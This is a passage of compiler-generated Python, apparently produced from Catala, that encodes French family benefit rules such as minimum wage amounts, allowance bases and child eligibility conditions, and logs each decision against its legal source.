return "AllocationFamilialesAvril2008Out(age_minimum_alinea_1_l521_3_out={})".format(self.age_minimum_alinea_1_l521_3_out)
class AllocationFamilialesAvril2008In:
def __init__(self, ) -> None:
pass
def __eq__(self, other: object) -> bool:
if isinstance(other, AllocationFamilialesAvril2008In):
return (True)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "AllocationFamilialesAvril2008In()".format()
class EnfantLePlusAgeOut:
def __init__(self, le_plus_age_out: Enfant) -> None:
self.le_plus_age_out = le_plus_age_out
def __eq__(self, other: object) -> bool:
if isinstance(other, EnfantLePlusAgeOut):
return (self.le_plus_age_out == other.le_plus_age_out)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "EnfantLePlusAgeOut(le_plus_age_out={})".format(self.le_plus_age_out)
class EnfantLePlusAgeIn:
def __init__(self, enfants_in: List[Enfant]) -> None:
self.enfants_in = enfants_in
def __eq__(self, other: object) -> bool:
if isinstance(other, EnfantLePlusAgeIn):
return (self.enfants_in == other.enfants_in)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "EnfantLePlusAgeIn(enfants_in={})".format(self.enfants_in)
class AllocationsFamilialesOut:
def __init__(self, montant_verse_out: Money) -> None:
self.montant_verse_out = montant_verse_out
def __eq__(self, other: object) -> bool:
if isinstance(other, AllocationsFamilialesOut):
return (self.montant_verse_out == other.montant_verse_out)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "AllocationsFamilialesOut(montant_verse_out={})".format(self.montant_verse_out)
class AllocationsFamilialesIn:
def __init__(self, personne_charge_effective_permanente_est_parent_in: bool, personne_charge_effective_permanente_remplit_titre_I_in: bool, ressources_menage_in: Money, residence_in: Collectivite, date_courante_in: Date, enfants_a_charge_in: List[Enfant], avait_enfant_a_charge_avant_1er_janvier_2012_in: bool) -> None:
self.personne_charge_effective_permanente_est_parent_in = personne_charge_effective_permanente_est_parent_in
self.personne_charge_effective_permanente_remplit_titre_I_in = personne_charge_effective_permanente_remplit_titre_I_in
self.ressources_menage_in = ressources_menage_in
self.residence_in = residence_in
self.date_courante_in = date_courante_in
self.enfants_a_charge_in = enfants_a_charge_in
self.avait_enfant_a_charge_avant_1er_janvier_2012_in = avait_enfant_a_charge_avant_1er_janvier_2012_in
def __eq__(self, other: object) -> bool:
if isinstance(other, AllocationsFamilialesIn):
return (self.personne_charge_effective_permanente_est_parent_in == other.personne_charge_effective_permanente_est_parent_in and
self.personne_charge_effective_permanente_remplit_titre_I_in == other.personne_charge_effective_permanente_remplit_titre_I_in and
self.ressources_menage_in == other.ressources_menage_in and
self.residence_in == other.residence_in and
self.date_courante_in == other.date_courante_in and
self.enfants_a_charge_in == other.enfants_a_charge_in and
self.avait_enfant_a_charge_avant_1er_janvier_2012_in == other.avait_enfant_a_charge_avant_1er_janvier_2012_in)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "AllocationsFamilialesIn(personne_charge_effective_permanente_est_parent_in={},personne_charge_effective_permanente_remplit_titre_I_in={},ressources_menage_in={},residence_in={},date_courante_in={},enfants_a_charge_in={},avait_enfant_a_charge_avant_1er_janvier_2012_in={})".format(self.personne_charge_effective_permanente_est_parent_in,
self.personne_charge_effective_permanente_remplit_titre_I_in,
self.ressources_menage_in, self.residence_in, self.date_courante_in,
self.enfants_a_charge_in,
self.avait_enfant_a_charge_avant_1er_janvier_2012_in)
class InterfaceAllocationsFamilialesOut:
def __init__(self, i_montant_verse_out: Money) -> None:
self.i_montant_verse_out = i_montant_verse_out
def __eq__(self, other: object) -> bool:
if isinstance(other, InterfaceAllocationsFamilialesOut):
return (self.i_montant_verse_out == other.i_montant_verse_out)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "InterfaceAllocationsFamilialesOut(i_montant_verse_out={})".format(self.i_montant_verse_out)
class InterfaceAllocationsFamilialesIn:
def __init__(self, i_date_courante_in: Date, i_enfants_in: List[EnfantEntree], i_ressources_menage_in: Money, i_residence_in: Collectivite, i_personne_charge_effective_permanente_est_parent_in: bool, i_personne_charge_effective_permanente_remplit_titre_I_in: bool, i_avait_enfant_a_charge_avant_1er_janvier_2012_in: bool) -> None:
self.i_date_courante_in = i_date_courante_in
self.i_enfants_in = i_enfants_in
self.i_ressources_menage_in = i_ressources_menage_in
self.i_residence_in = i_residence_in
self.i_personne_charge_effective_permanente_est_parent_in = i_personne_charge_effective_permanente_est_parent_in
self.i_personne_charge_effective_permanente_remplit_titre_I_in = i_personne_charge_effective_permanente_remplit_titre_I_in
self.i_avait_enfant_a_charge_avant_1er_janvier_2012_in = i_avait_enfant_a_charge_avant_1er_janvier_2012_in
def __eq__(self, other: object) -> bool:
if isinstance(other, InterfaceAllocationsFamilialesIn):
return (self.i_date_courante_in == other.i_date_courante_in and
self.i_enfants_in == other.i_enfants_in and
self.i_ressources_menage_in == other.i_ressources_menage_in and
self.i_residence_in == other.i_residence_in and
self.i_personne_charge_effective_permanente_est_parent_in == other.i_personne_charge_effective_permanente_est_parent_in and
self.i_personne_charge_effective_permanente_remplit_titre_I_in == other.i_personne_charge_effective_permanente_remplit_titre_I_in and
self.i_avait_enfant_a_charge_avant_1er_janvier_2012_in == other.i_avait_enfant_a_charge_avant_1er_janvier_2012_in)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "InterfaceAllocationsFamilialesIn(i_date_courante_in={},i_enfants_in={},i_ressources_menage_in={},i_residence_in={},i_personne_charge_effective_permanente_est_parent_in={},i_personne_charge_effective_permanente_remplit_titre_I_in={},i_avait_enfant_a_charge_avant_1er_janvier_2012_in={})".format(self.i_date_courante_in,
self.i_enfants_in, self.i_ressources_menage_in, self.i_residence_in,
self.i_personne_charge_effective_permanente_est_parent_in,
self.i_personne_charge_effective_permanente_remplit_titre_I_in,
self.i_avait_enfant_a_charge_avant_1er_janvier_2012_in)
def smic(smic_in_1: SmicIn):
date_courante_2 = smic_in_1.date_courante_in
residence_3 = smic_in_1.residence_in
try:
def local_var_20(_: Any):
raise EmptyError
def local_var_18(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=43, start_column=10, end_line=43, end_column=22,
law_headings=["Prologue"]), True)
def local_var_16(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=219, start_column=5,
end_line=228, end_column=6, law_headings=["Article 1",
"Décret n° 2018-1173 du 19 décembre 2018 portant relèvement du salaire minimum de croissance",
"Montant du salaire minimum de croissance",
"Décrets divers"]), ((date_courante_2 >=
date_of_numbers(2019, 1, 1)) and ((date_courante_2 <=
date_of_numbers(2019, 12, 31)) and ((residence_3 ==
Collectivite(Collectivite_Code.Metropole, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
((residence_3 == Collectivite(Collectivite_Code.Guyane,
Unit())) or ((residence_3 ==
Collectivite(Collectivite_Code.Martinique, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.LaReunion, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.SaintBarthelemy,
Unit())) or ((residence_3 ==
Collectivite(Collectivite_Code.SaintMartin, Unit())) or
(residence_3 ==
Collectivite(Collectivite_Code.SaintPierreEtMiquelon,
Unit())))))))))))):
return money_of_cents_string("1003")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_14(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=237, start_column=5,
end_line=239, end_column=6, law_headings=["Article 1",
"Décret n° 2018-1173 du 19 décembre 2018 portant relèvement du salaire minimum de croissance",
"Montant du salaire minimum de croissance",
"Décrets divers"]), ((date_courante_2 >=
date_of_numbers(2019, 1, 1)) and ((date_courante_2 <=
date_of_numbers(2019, 12, 31)) and (residence_3 ==
Collectivite(Collectivite_Code.Mayotte,
Unit()))))):
return money_of_cents_string("757")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_12(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=258, start_column=5,
end_line=267, end_column=6, law_headings=["Article 1",
"Décret n° 2019-1387 du 18 décembre 2019 portant relèvement du salaire minimum de croissance",
"Montant du salaire minimum de croissance",
"Décrets divers"]), ((date_courante_2 >=
date_of_numbers(2020, 1, 1)) and ((date_courante_2 <=
date_of_numbers(2020, 12, 31)) and ((residence_3 ==
Collectivite(Collectivite_Code.Metropole, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
((residence_3 == Collectivite(Collectivite_Code.Guyane,
Unit())) or ((residence_3 ==
Collectivite(Collectivite_Code.Martinique, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.LaReunion, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.SaintBarthelemy,
Unit())) or ((residence_3 ==
Collectivite(Collectivite_Code.SaintMartin, Unit())) or
(residence_3 ==
Collectivite(Collectivite_Code.SaintPierreEtMiquelon,
Unit())))))))))))):
return money_of_cents_string("1015")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_10(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=276, start_column=5,
end_line=278, end_column=6, law_headings=["Article 1",
"Décret n° 2019-1387 du 18 décembre 2019 portant relèvement du salaire minimum de croissance",
"Montant du salaire minimum de croissance",
"Décrets divers"]), ((date_courante_2 >=
date_of_numbers(2020, 1, 1)) and ((date_courante_2 <=
date_of_numbers(2020, 12, 31)) and (residence_3 ==
Collectivite(Collectivite_Code.Mayotte,
Unit()))))):
return money_of_cents_string("766")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_8(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=297, start_column=5,
end_line=306, end_column=6, law_headings=["Article 1",
"Décret n° 2020-1598 du 16 décembre 2020 portant relèvement du salaire minimum de croissance",
"Montant du salaire minimum de croissance",
"Décrets divers"]), ((date_courante_2 >=
date_of_numbers(2021, 1, 1)) and ((date_courante_2 <=
date_of_numbers(2021, 12, 31)) and ((residence_3 ==
Collectivite(Collectivite_Code.Metropole, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
((residence_3 == Collectivite(Collectivite_Code.Guyane,
Unit())) or ((residence_3 ==
Collectivite(Collectivite_Code.Martinique, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.LaReunion, Unit())) or
((residence_3 ==
Collectivite(Collectivite_Code.SaintBarthelemy,
Unit())) or ((residence_3 ==
Collectivite(Collectivite_Code.SaintMartin, Unit())) or
(residence_3 ==
Collectivite(Collectivite_Code.SaintPierreEtMiquelon,
Unit())))))))))))):
return money_of_cents_string("1025")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_6(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=315, start_column=5,
end_line=317, end_column=6, law_headings=["Article 1",
"Décret n° 2020-1598 du 16 décembre 2020 portant relèvement du salaire minimum de croissance",
"Montant du salaire minimum de croissance",
"Décrets divers"]), ((date_courante_2 >=
date_of_numbers(2021, 1, 1)) and ((date_courante_2 <=
date_of_numbers(2021, 12, 31)) and (residence_3 ==
Collectivite(Collectivite_Code.Mayotte,
Unit()))))):
return money_of_cents_string("774")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_5 = handle_default([local_var_6, local_var_8, local_var_10,
local_var_12, local_var_14,
local_var_16], local_var_18,
local_var_20)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=43, start_column=10,
end_line=43, end_column=22,
law_headings=["Prologue"]))
brut_horaire_4 = log_variable_definition(["Smic", "brut_horaire"],
local_var_5)
return SmicOut(brut_horaire_out=brut_horaire_4)
def allocation_familiales_avril2008(allocation_familiales_avril2008_in_22: AllocationFamilialesAvril2008In):
try:
local_var_24 = integer_of_string("16")
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=81, start_column=10,
end_line=81, end_column=37,
law_headings=["Prologue"]))
age_minimum_alinea_1_l521_3_23 = log_variable_definition(["AllocationFamilialesAvril2008",
"âge_minimum_alinéa_1_l521_3"], local_var_24)
return AllocationFamilialesAvril2008Out(age_minimum_alinea_1_l521_3_out=age_minimum_alinea_1_l521_3_23)
def enfant_le_plus_age(enfant_le_plus_age_in_25: EnfantLePlusAgeIn):
enfants_26 = enfant_le_plus_age_in_25.enfants_in
try:
try:
try:
def local_var_29(acc_30: Any, item_31: Any):
if (acc_30.age > item_31.age):
return acc_30
else:
return item_31
local_var_28 = list_fold_left(local_var_29,
Enfant(identifiant=- integer_of_string("1"),
obligation_scolaire=SituationObligationScolaire(SituationObligationScolaire_Code.Pendant,
Unit()),
remuneration_mensuelle=money_of_cents_string(
"0"),
date_de_naissance=date_of_numbers(
1900, 1, 1),
age=integer_of_string(
"0"),
prise_en_charge=PriseEnCharge(PriseEnCharge_Code.EffectiveEtPermanente,
Unit()),
a_deja_ouvert_droit_aux_allocations_familiales=False),
enfants_26)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=85, start_column=10,
end_line=85, end_column=21,
law_headings=["Prologue"]))
le_plus_age_27 = log_variable_definition(["EnfantLePlusÂgé",
"le_plus_âgé"], local_var_28)
return EnfantLePlusAgeOut(le_plus_age_out=le_plus_age_27)
def prestations_familiales(prestations_familiales_in_32: PrestationsFamilialesIn):
date_courante_33 = prestations_familiales_in_32.date_courante_in
prestation_courante_34 = prestations_familiales_in_32.prestation_courante_in
residence_35 = prestations_familiales_in_32.residence_in
try:
local_var_37 = integer_of_string("20")
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=68, start_column=10,
end_line=68, end_column=22,
law_headings=["Prologue"]))
age_l512_3_2_36 = log_variable_definition(["PrestationsFamiliales",
"âge_l512_3_2"], local_var_37)
try:
def local_var_48(_: Any):
raise EmptyError
def local_var_46(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=74, start_column=10, end_line=74, end_column=24,
law_headings=["Prologue"]), True)
def local_var_44(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=24, start_column=5,
end_line=25, end_column=34,
law_headings=["Instruction ministérielle N°DSS/SD2B/2019/65 du 25 mars 2019 relative à la revalorisation au 1er avril 2019 des prestations familiales servies en métropole",
"Montant de la base mensuelle des allocations familiales",
"Décrets divers"]), ((date_courante_33 >=
date_of_numbers(2019, 4, 1)) and (date_courante_33 <
date_of_numbers(2020, 4, 1)))):
return money_of_cents_string("41316")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_42(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=44, start_column=5,
end_line=45, end_column=34,
law_headings=["Instruction interministérielle no DSS/SD2B/2020/33 du 18 février 2020 relative à la revalorisation au 1er avril 2020 des prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à La Réunion, à Saint-Barthélemy, à Saint-Martin et dans le département de Mayotte",
"Montant de la base mensuelle des allocations familiales",
"Décrets divers"]), ((date_courante_33 >=
date_of_numbers(2020, 4, 1)) and (date_courante_33 <
date_of_numbers(2021, 4, 1)))):
return money_of_cents_string("41404")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_40(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=60, start_column=5,
end_line=61, end_column=34,
law_headings=["Instruction interministérielle n°DSS/2B/2021/65 du 19 mars 2021 relative à la revalorisation au 1er avril 2021 des prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et dans le département de Mayotte",
"Montant de la base mensuelle des allocations familiales",
"Décrets divers"]), ((date_courante_33 >=
date_of_numbers(2021, 4, 1)) and (date_courante_33 <
date_of_numbers(2022, 4, 1)))):
return money_of_cents_string("41481")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_39 = handle_default([local_var_40, local_var_42,
local_var_44], local_var_46,
local_var_48)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=74, start_column=10,
end_line=74, end_column=24,
law_headings=["Prologue"]))
base_mensuelle_38 = log_variable_definition(["PrestationsFamiliales",
"base_mensuelle"], local_var_39)
try:
try:
try:
local_var_52 = date_courante_33
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_51 = log_variable_definition(["PrestationsFamiliales",
"smic.date_courante"], local_var_52)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=41, start_column=10,
end_line=41, end_column=23,
law_headings=["Prologue"]))
smic_dot_date_courante_50 = local_var_51
try:
try:
try:
local_var_55 = residence_35
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_54 = log_variable_definition(["PrestationsFamiliales",
"smic.résidence"], local_var_55)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=42, start_column=10,
end_line=42, end_column=19,
law_headings=["Prologue"]))
smic_dot_residence_53 = local_var_54
result_56 = log_end_call(["PrestationsFamiliales", "smic", "Smic"],
log_begin_call(["PrestationsFamiliales", "smic", "Smic"], smic,
SmicIn(date_courante_in=smic_dot_date_courante_50,
residence_in=smic_dot_residence_53)))
smic_dot_brut_horaire_57 = result_56.brut_horaire_out
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=354, start_column=5,
end_line=359, end_column=30,
law_headings=["Article L751-1",
"Chapitre 1er : Généralités",
"Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie législative",
"Code de la sécurité sociale"]), ((residence_35 ==
Collectivite(Collectivite_Code.Guadeloupe, Unit())) or
((residence_35 == Collectivite(Collectivite_Code.Guyane,
Unit())) or ((residence_35 ==
Collectivite(Collectivite_Code.Martinique, Unit())) or
((residence_35 ==
Collectivite(Collectivite_Code.LaReunion, Unit())) or
((residence_35 ==
Collectivite(Collectivite_Code.SaintBarthelemy,
Unit())) or (residence_35 ==
Collectivite(Collectivite_Code.SaintMartin,
Unit())))))))):
local_var_59 = True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
local_var_59 = False
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=69, start_column=10,
end_line=69, end_column=33,
law_headings=["Prologue"]))
regime_outre_mer_l751_1_58 = log_variable_definition(["PrestationsFamiliales",
"régime_outre_mer_l751_1"], local_var_59)
try:
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_R.catala_fr",
start_line=216, start_column=18,
end_line=216, end_column=41,
law_headings=["Article R755-0-2",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets en Conseil d'Etat",
"Code de la sécurité sociale"]), regime_outre_mer_l751_1_58):
local_var_61 = ((smic_dot_brut_horaire_57 *
decimal_of_string("0.55")) *
decimal_of_string("169."))
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
try:
local_var_61 = ((smic_dot_brut_horaire_57 *
decimal_of_string("0.55")) *
decimal_of_string("169."))
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=67, start_column=11,
end_line=67, end_column=27,
law_headings=["Prologue"]))
plafond_l512_3_2_60 = log_variable_definition(["PrestationsFamiliales",
"plafond_l512_3_2"], local_var_61)
try:
def local_var_63(param_64: Enfant):
try:
try:
try:
match_arg_540 = param_64.obligation_scolaire
if match_arg_540.code == SituationObligationScolaire_Code.Avant:
_ = match_arg_540.value
local_var_73 = False
elif match_arg_540.code == SituationObligationScolaire_Code.Pendant:
_ = match_arg_540.value
local_var_73 = False
elif match_arg_540.code == SituationObligationScolaire_Code.Apres:
_ = match_arg_540.value
local_var_73 = True
match_arg_541 = param_64.obligation_scolaire
if match_arg_541.code == SituationObligationScolaire_Code.Avant:
_ = match_arg_541.value
local_var_69 = False
elif match_arg_541.code == SituationObligationScolaire_Code.Pendant:
_ = match_arg_541.value
local_var_69 = True
elif match_arg_541.code == SituationObligationScolaire_Code.Apres:
_ = match_arg_541.value
local_var_69 = False
match_arg_542 = param_64.obligation_scolaire
if match_arg_542.code == SituationObligationScolaire_Code.Avant:
_ = match_arg_542.value
local_var_65 = True
elif match_arg_542.code == SituationObligationScolaire_Code.Pendant:
_ = match_arg_542.value
local_var_65 = False
elif match_arg_542.code == SituationObligationScolaire_Code.Apres:
_ = match_arg_542.value
local_var_65 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=68, start_column=5,
end_line=71, end_column=57,
law_headings=["Article L512-3",
"Chapitre 2 : Champ d'application",
"Titre 1 : Champ d'application - Généralités",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), ((local_var_65 or
(local_var_69 or local_var_73)) and
(param_64.remuneration_mensuelle <=
plafond_l512_3_2_60))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
return False
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=66,
start_column=10,
end_line=66,
end_column=29,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=66, start_column=10,
end_line=66, end_column=29,
law_headings=["Prologue"]))
conditions_hors_age_62 = log_variable_definition(["PrestationsFamiliales",
"conditions_hors_âge"], local_var_63)
try:
def local_var_78(param_79: Enfant):
try:
def local_var_98(_: Any):
return False
def local_var_96(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=65, start_column=10,
end_line=65, end_column=22,
law_headings=["Prologue"]), True)
def local_var_86(_: Any):
try:
match_arg_543 = param_79.obligation_scolaire
if match_arg_543.code == SituationObligationScolaire_Code.Avant:
_ = match_arg_543.value
local_var_92 = False
elif match_arg_543.code == SituationObligationScolaire_Code.Pendant:
_ = match_arg_543.value
local_var_92 = True
elif match_arg_543.code == SituationObligationScolaire_Code.Apres:
_ = match_arg_543.value
local_var_92 = False
match_arg_544 = param_79.obligation_scolaire
if match_arg_544.code == SituationObligationScolaire_Code.Avant:
_ = match_arg_544.value
local_var_88 = True
elif match_arg_544.code == SituationObligationScolaire_Code.Pendant:
_ = match_arg_544.value
local_var_88 = False
elif match_arg_544.code == SituationObligationScolaire_Code.Apres:
_ = match_arg_544.value
local_var_88 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=49, start_column=5,
end_line=50, end_column=50,
law_headings=["Article L512-3",
"Chapitre 2 : Champ d'application",
"Titre 1 : Champ d'application - Généralités",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), (local_var_88 or
local_var_92)):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_80(_: Any):
try:
match_arg_545 = param_79.obligation_scolaire
if match_arg_545.code == SituationObligationScolaire_Code.Avant:
_ = match_arg_545.value
local_var_82 = False
elif match_arg_545.code == SituationObligationScolaire_Code.Pendant:
_ = match_arg_545.value
local_var_82 = False
elif match_arg_545.code == SituationObligationScolaire_Code.Apres:
_ = match_arg_545.value
local_var_82 = True
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=60, start_column=5,
end_line=62, end_column=32,
law_headings=["Article L512-3",
"Chapitre 2 : Champ d'application",
"Titre 1 : Champ d'application - Généralités",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), (local_var_82 and
((param_79.remuneration_mensuelle <=
plafond_l512_3_2_60) and (param_79.age <
age_l512_3_2_36)))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_80, local_var_86],
local_var_96, local_var_98)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=65,
start_column=10,
end_line=65,
end_column=22,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=65, start_column=10,
end_line=65, end_column=22,
law_headings=["Prologue"]))
droit_ouvert_77 = log_variable_definition(["PrestationsFamiliales",
"droit_ouvert"], local_var_78)
return PrestationsFamilialesOut(droit_ouvert_out=droit_ouvert_77,
conditions_hors_age_out=conditions_hors_age_62,
age_l512_3_2_out=age_l512_3_2_36,
regime_outre_mer_l751_1_out=regime_outre_mer_l751_1_58,
base_mensuelle_out=base_mensuelle_38)
def allocations_familiales(allocations_familiales_in_100: AllocationsFamilialesIn):
personne_charge_effective_permanente_est_parent_101 = allocations_familiales_in_100.personne_charge_effective_permanente_est_parent_in
personne_charge_effective_permanente_remplit_titre__i_102 = allocations_familiales_in_100.personne_charge_effective_permanente_remplit_titre_I_in
ressources_menage_103 = allocations_familiales_in_100.ressources_menage_in
residence_104 = allocations_familiales_in_100.residence_in
date_courante_105 = allocations_familiales_in_100.date_courante_in
enfants_a_charge_106 = allocations_familiales_in_100.enfants_a_charge_in
avait_enfant_a_charge_avant_1er_janvier_2012_107 = allocations_familiales_in_100.avait_enfant_a_charge_avant_1er_janvier_2012_in
try:
def local_var_109(param_110: Enfant):
try:
def local_var_153(_: Any):
raise EmptyError
def local_var_151(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=102, start_column=11,
end_line=102, end_column=26,
law_headings=["Prologue"]), True)
def local_var_143(_: Any):
try:
match_arg_546 = param_110.prise_en_charge
if match_arg_546.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_546.value
local_var_145 = False
elif match_arg_546.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_546.value
local_var_145 = False
elif match_arg_546.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_546.value
local_var_145 = True
elif match_arg_546.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_546.value
local_var_145 = False
elif match_arg_546.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_546.value
local_var_145 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=184, start_column=5,
end_line=184, end_column=60,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_145):
return PriseEnCompte(PriseEnCompte_Code.Complete,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_135(_: Any):
try:
match_arg_547 = param_110.prise_en_charge
if match_arg_547.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_547.value
local_var_137 = False
elif match_arg_547.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_547.value
local_var_137 = True
elif match_arg_547.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_547.value
local_var_137 = False
elif match_arg_547.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_547.value
local_var_137 = False
elif match_arg_547.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_547.value
local_var_137 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=204, start_column=5,
end_line=204, end_column=69,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_137):
return PriseEnCompte(PriseEnCompte_Code.Complete,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_127(_: Any):
try:
match_arg_548 = param_110.prise_en_charge
if match_arg_548.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_548.value
local_var_129 = True
elif match_arg_548.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_548.value
local_var_129 = False
elif match_arg_548.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_548.value
local_var_129 = False
elif match_arg_548.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_548.value
local_var_129 = False
elif match_arg_548.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_548.value
local_var_129 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=214, start_column=5,
end_line=214, end_column=70,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_129):
return PriseEnCompte(PriseEnCompte_Code.Partagee,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_119(_: Any):
try:
match_arg_549 = param_110.prise_en_charge
if match_arg_549.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_549.value
local_var_121 = False
